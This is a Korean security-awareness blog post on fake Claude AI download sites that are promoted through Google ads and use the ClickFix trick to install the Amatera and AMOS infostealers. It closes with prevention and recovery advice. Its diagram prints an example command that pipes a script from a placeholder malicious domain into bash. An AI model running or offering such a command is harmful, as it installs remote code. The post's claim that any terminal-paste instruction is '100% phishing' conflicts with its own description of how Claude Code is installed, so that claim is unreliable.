검색 1위가 가짜였다 클로드 AI 사칭 피싱 완벽 분석 - 대응법

 

<클로드 다운로드 페이지로 위장한 피싱 사이트>

🚨 보안 경보 · 2026년 4월

검색 1위가 가짜였다
클로드 AI 사칭 피싱
완벽 분석 & 대응법

구글 광고 최상단을 점령한 피싱 사이트, 공식 홈페이지와 구별 불가능한 디자인, 그리고 백신도 막지 못하는 ClickFix 기법 — 안랩·카스퍼스키가 공식 경고한 수법을 낱낱이 분석합니다.

📅 2026년 4월 27일 🔰 출처: AhnLab · Kaspersky ⏱ 읽기 약 8분
CLAUDE AI 사칭 피싱 공격 흐름도 ① 구글 광고 조작 'claude app' 검색 시 피싱 사이트 최상단 노출 ▲ Sponsored 광고 악용 ② 가짜 사이트 접속 공식 홈페이지와 동일 디자인 OS별 다운로드 버튼 배치 ▲ 육안 구별 거의 불가 ③ ClickFix 실행 터미널 명령어 붙여넣기 유도 → 악성코드 실행 ▲ 백신 탐지 우회 🔑 계정·비밀번호 탈취 브라우저 저장 정보 유출 Windows → Amatera ₿ 암호화폐 지갑 탈취 지갑 시드 구문 전송 macOS → AMOS 💼 소스코드·자격증명 기업 프로젝트 파일 유출 MaaS 모델로 확산 🚪 백도어 설치 지속적 원격 제어 가능 2차·3차 공격 발판 ⚠ 클로드 공식 도메인: claude.ai · anthropic.com — 이 주소 외 설치 경로는 100% 의심 출처: AhnLab Security Emergency Response Center · Kaspersky Threat Intelligence (2026.03~04)
📊 클로드 AI 사칭 피싱 공격 전체 흐름 — 광고 조작 → 가짜 사이트 → ClickFix → 정보 탈취
📌 사건 개요

검색 1위가 가짜였다 — 무슨 일이 벌어진 건가요?

"설마 요즘 사람들이 그걸 속나?" — IT 보안 교육을 8년간 해온 전문가도 처음에는 그렇게 생각했습니다. 그런데 2026년 4월, 안랩(AhnLab)이 공식 발표한 내용을 보고 생각이 완전히 바뀌었다고 했죠.

공격자들이 구글 검색 광고를 직접 구매해서 '클로드 앱(claude app)', '클로드 데스크톱(claude desktop)' 키워드 검색 시 피싱 사이트가 검색 결과 최상단에 뜨도록 만들었습니다. "위에 있는 게 공식이겠지"라는 사람들의 심리를 정확히 파고든 겁니다.

🚨
공식 경고: 2026년 4월 22일 안랩, 2026년 3월 19일 카스퍼스키가 각각 클로드 AI 및 클로드 코드 사칭 피싱 공격을 공식 경고했습니다. 실제 악성코드 감염 피해가 다수 확인됐습니다.
🎭 사칭 수법 분석

어떻게 사칭하나 — 3단계 공격 수법

이번 공격이 특별히 위험한 이유는 3가지 함정을 동시에 사용하기 때문입니다. 검색 조작, 디자인 위장, 그리고 ClickFix 기법이 겹쳐지면 보안 전문가도 순간 방심할 수 있습니다.

1
구글 검색 광고 최상단 점령 (SEO 포이즈닝)
공격자가 구글 광고(Google Ads)를 직접 구매해 'claude app', 'claude desktop', 'claude code install' 등의 키워드로 검색할 때 피싱 사이트를 최상단 Sponsored 영역에 노출시켰습니다. 광고비만 내면 누구나 할 수 있는 방법이지만, 사용자는 광고 = 공식이라는 잘못된 인식이 있습니다.
2
공식 홈페이지 1:1 복제 — 육안 구별 불가
피싱 사이트는 클로드 공식 홈페이지를 픽셀 단위로 복제했습니다. "클로드를 데스크톱에서 이용해보세요(Bring Claude to your Desktop)"라는 문구와 함께 Windows/macOS 운영체제별 다운로드 버튼까지 배치됐습니다. 특히 앤트로픽이 클로드 코드의 소스 맵 파일을 실수로 유출한 사고 이후, 공격자들이 정확한 UI/UX를 복제하는 것이 더욱 쉬워졌습니다.
3
ClickFix — 사용자 손으로 악성코드를 실행하게 만든다
다운로드 버튼을 누르면 설치 파일이 아닌 '설치 안내 팝업'이 뜹니다. "특정 명령어를 복사해서 터미널에 붙여넣으면 설치가 시작됩니다"라고 안내하는데, 이것이 바로 ClickFix 기법입니다. 사용자 스스로 악성 명령어를 실행하게 유도해 일반 백신 파일 검사를 완전히 우회합니다.
ClickFix 기법 — 왜 백신이 막지 못하는가 ✅ 일반 악성코드 (백신이 막는 방식) 악성 파일(.exe, .dmg) 다운로드 🛡 백신이 파일 스캔 → 차단 성공 파일 기반 탐지로 99% 차단 가능 ⚠ ClickFix (백신이 막지 못함) 팝업: "이 명령어를 터미널에 붙여넣기" 😱 사용자 손으로 명령 직접 실행 정상 사용자 행위처럼 보여 탐지 불가 VS $ curl -fsSL https://악성-도메인.xyz/install.sh | bash # 위 명령어 실행 시: 정보탈취 악성코드(Amatera/AMOS) 즉시 설치됨 ⚠ 예시 목적 재구성 — 실제 공격 명령어는 무해하게 보이도록 더 정교하게 위장됨
⚙ ClickFix 기법 원리 — 파일이 아닌 '명령어 실행'을 유도해 백신 탐지를 완전 우회
💡
핵심 포인트: 정상적인 소프트웨어는 절대로 터미널에 명령어를 복사·붙여넣기 하라고 요구하지 않습니다. 이런 요구가 나오면 100% 피싱입니다.
💀 피해 분석

감염되면 무슨 일이 일어나나요?

악성코드가 실행되는 순간, 공격자는 피해자 PC에 대한 광범위한 접근 권한을 얻습니다. 특히 이번에 사용된 악성코드는 운영체제별로 맞춤 배포되는 고도화된 형태입니다.

🪟 Windows 감염 — Amatera
  • 🔑 브라우저 저장 아이디·비밀번호
  • 🍪 로그인 세션 쿠키 탈취
  • 암호화폐 지갑 키/시드 구문
  • 📁 중요 문서 파일 수집·전송
  • 🚪 백도어 설치 → 원격 제어
🍎 macOS 감염 — AMOS
  • 🔑 iCloud 키체인 비밀번호
  • 💳 Safari 저장 카드·계정 정보
  • MetaMask 등 지갑 자산
  • 💼 개발 프로젝트 소스코드
  • 🏢 AWS·GitHub 자격증명(토큰)
🏢
기업 개발자 특별 경고: 클로드 코드는 대기업 개발자들이 실제 프로젝트에 활발히 도입 중입니다. 감염 시 회사 소스코드·API 키·서버 접근 자격증명이 통째로 유출될 수 있으며, 이는 개인 피해를 넘어 조직 전체의 보안 위기로 확산됩니다.
악성코드 감염 시 정보 탈취 범위 💀 악성코드 Amatera / AMOS 🔑 아이디·비밀번호 ₿ 암호화폐 지갑 💼 기업 소스코드 ☁ 클라우드 자격증명 🍪 세션·쿠키 정보 🚪 백도어·원격제어 📁 로컬 문서·파일 💳 금융·결제 정보
📊 악성코드 감염 시 탈취되는 정보 범위 — 개인 데이터부터 기업 자산까지
🧠 심리 분석

왜 이렇게 많이 속을까 — 심리적 함정 3가지

이번 공격이 무서운 건 기술적 정교함뿐만 아니라, 사용자의 인지적 허점을 정확히 공략한다는 점입니다.

1
검색 순위 = 신뢰 라는 착각
구글 광고는 돈만 내면 누구나 최상단에 올릴 수 있습니다. 공식 사이트가 오히려 아래에 밀리는 상황이 얼마든지 가능하죠. 안랩 김동현 매니저도 "검색 결과 상단 노출 여부와 상관없이 도메인 주소를 반드시 확인해야 한다"고 강조했습니다.
2
설치 화면이 익숙해 보인다는 착각
클로드 코드는 원래 터미널 명령어로 설치하는 개발 도구입니다. 개발자라면 터미널에 명령어 붙여넣기가 전혀 낯설지 않습니다. 공격자는 바로 이 점을 노렸습니다. "스크립트 호출 → 파일 다운로드 → 실행"이 단계적으로 이뤄져 평소 설치 경험과 구별이 어렵습니다.
3
인기 서비스라 더 믿는다는 착각
클로드는 현재 세계적으로 가장 주목받는 AI 서비스 중 하나입니다. 인기가 높을수록 사용자는 관련 콘텐츠에 경계심을 낮추는 경향이 있습니다. 공격자들은 바로 이 심리를 노려 가장 핫한 서비스를 표적으로 삼습니다.
🛡 예방 및 대응

이렇게 하면 99% 막을 수 있어요

진짜 클로드 vs 가짜 피싱 사이트 — 이것만 보면 구별된다 ✅ 진짜 클로드 (공식) 🔒 claude.ai • 도메인: claude.ai 또는 anthropic.com • 설치 시 .exe / .dmg 파일 다운로드 • 절대로 터미널 명령어 붙여넣기 요구 없음 • 검색 결과에서 Sponsored 아님 • HTTPS + 정식 SSL 인증서 👍 이 주소면 안전합니다 VS ❌ 가짜 피싱 사이트 🚨 claude-app-download.xyz • 도메인: 비슷하지만 다른 주소 • 다운로드 버튼 → 팝업만 뜸 (파일 없음) • ⚠ 터미널 명령어 복붙 요구! • 검색 결과 최상단 Sponsored 표시 • 디자인은 거의 동일하게 복제됨 🚫 즉시 창을 닫으세요
🔍 진짜 클로드 공식 사이트 vs 가짜 피싱 사이트 비교 — 도메인과 명령어 요구 여부로 구별
🛡 피싱 피해 예방 수칙 — 이것만 지키면 90% 막을 수 있습니다
🔍
도메인 주소를 직접 확인하세요
클로드 공식 도메인은 claude.ai, 앤트로픽 공식 도메인은 anthropic.com입니다. 주소창에 이 주소가 정확히 없으면 바로 닫으세요. 한 글자도 틀리면 안 됩니다.
📢
검색 결과 Sponsored 광고는 일단 의심
광고 표시가 붙은 검색 결과는 순위와 무관하게 광고비를 낸 사람이 올린 것입니다. 공식 사이트인지 아닌지는 오직 도메인으로만 판단하세요.
⌨️
터미널 명령어 붙여넣기를 요구하면 100% 피싱
웹사이트나 팝업창이 터미널(Terminal) 또는 명령 프롬프트(CMD)에 특정 명령어를 복사해서 실행하라고 안내하면, 어떤 이유를 대더라도 절대 따르지 마세요.
🔄
OS·브라우저·백신을 항상 최신 버전으로
ClickFix 기법 자체를 백신이 막기는 어렵지만, 최신 보안 패치가 적용된 환경은 악성코드 실행 이후 확산을 방어하는 데 도움이 됩니다.
📋
출처 불명 명령어는 절대 복붙하지 않기
인터넷에서 복사한 명령어를 무심코 터미널에 붙여넣는 행위 자체가 위험합니다. 반드시 공식 문서에서 제공하는 명령어만 사용하세요.
🏢
조직이라면 AI 개발 도구 도입 절차 표준화
개발팀에서 AI 도구를 쓴다면 공식 도입 절차(화이트리스트 정책)를 마련하고, 비공식 경로의 다운로드를 정책으로 차단하는 보안 거버넌스가 필요합니다.
🚑 사후 대응

이미 명령어를 실행했다면? — 즉각 조치 순서

1
즉시 인터넷 연결 차단
악성코드가 정보를 공격자 서버로 전송하는 것을 막기 위해 Wi-Fi 또는 랜 케이블을 즉시 끊으세요.
2
전체 시스템 보안 검사 실행
V3, 알약, Kaspersky, Malwarebytes 등 신뢰할 수 있는 백신으로 전체 스캔을 실행하세요. 오프라인 부팅 스캔이 가능하면 더욱 효과적입니다.
3
모든 중요 계정 비밀번호 즉시 변경
이메일, 금융, 업무 계정의 비밀번호를 다른 기기에서 변경하세요. 2단계 인증(2FA)을 즉시 활성화하고, 세션·토큰을 모두 재발급 받으세요.
4
암호화폐 지갑 즉시 이전
암호화폐 지갑이 있다면 즉시 새 지갑으로 자산을 이전하세요. 시드 구문이 이미 탈취됐을 가능성을 감안해 기존 지갑은 폐기하는 것이 안전합니다.
5
KISA 인터넷침해대응센터 신고
한국인터넷진흥원(KISA) 보호나라 118에 신고하세요. 악성 사이트 차단 요청도 함께 하면 다른 피해자를 막는 데 도움이 됩니다.
클로드 AI는 훌륭한 서비스입니다
문제는 그 인기를 악용하는 사람들

클로드 AI 자체는 안전하고 훌륭한 서비스입니다. 다만 그 인기를 악용하는 공격자들이 존재한다는 현실을 직시해야 합니다. 클로드를 사용하고 싶다면, 아래 단 하나의 주소만 기억하세요. 이 주소 이외의 경로로 설치를 유도하는 곳은 모두 의심하세요.

✅ claude.ai
📌 클로드 AI 사칭 피싱 — 핵심 3가지만 기억하세요 🔍 도메인 확인 광고 순위 ≠ 신뢰 claude.ai 만 안전 주소창 직접 입력! ⌨️ 명령어 요구 = 피싱 터미널 복붙 절대 금지 정상 SW는 요구 안 함 ClickFix 수법 주의! 🛡️ 감염 시 즉시 차단 인터넷 연결 끊기 비밀번호 전부 변경 118 신고 필수!
📌 클로드 AI 사칭 피싱 대응 핵심 3원칙 — 도메인 확인 · 명령어 거부 · 즉시 대응
📌 출처: AhnLab Security Emergency Response Center (2026.04.22) · Kaspersky Threat Intelligence (2026.03.19) · 대구 IT강사 다건쌤 블로그 · Digital Focus News (2026.03.19) · 카스퍼스키 공식 보고서 kaspersky.com/blog/fake-ai-agents-infostealers/55412/
#클로드AI피싱 #ClickFix #클릭픽스 #AI사칭 #사이버보안 #구글광고피싱 #악성코드 #AMOS #Amatera #정보보안 #피싱주의 #보안수칙 #클로드코드 #안랩 #카스퍼스키 #개인정보보호
Location: 대한민국 서울특별시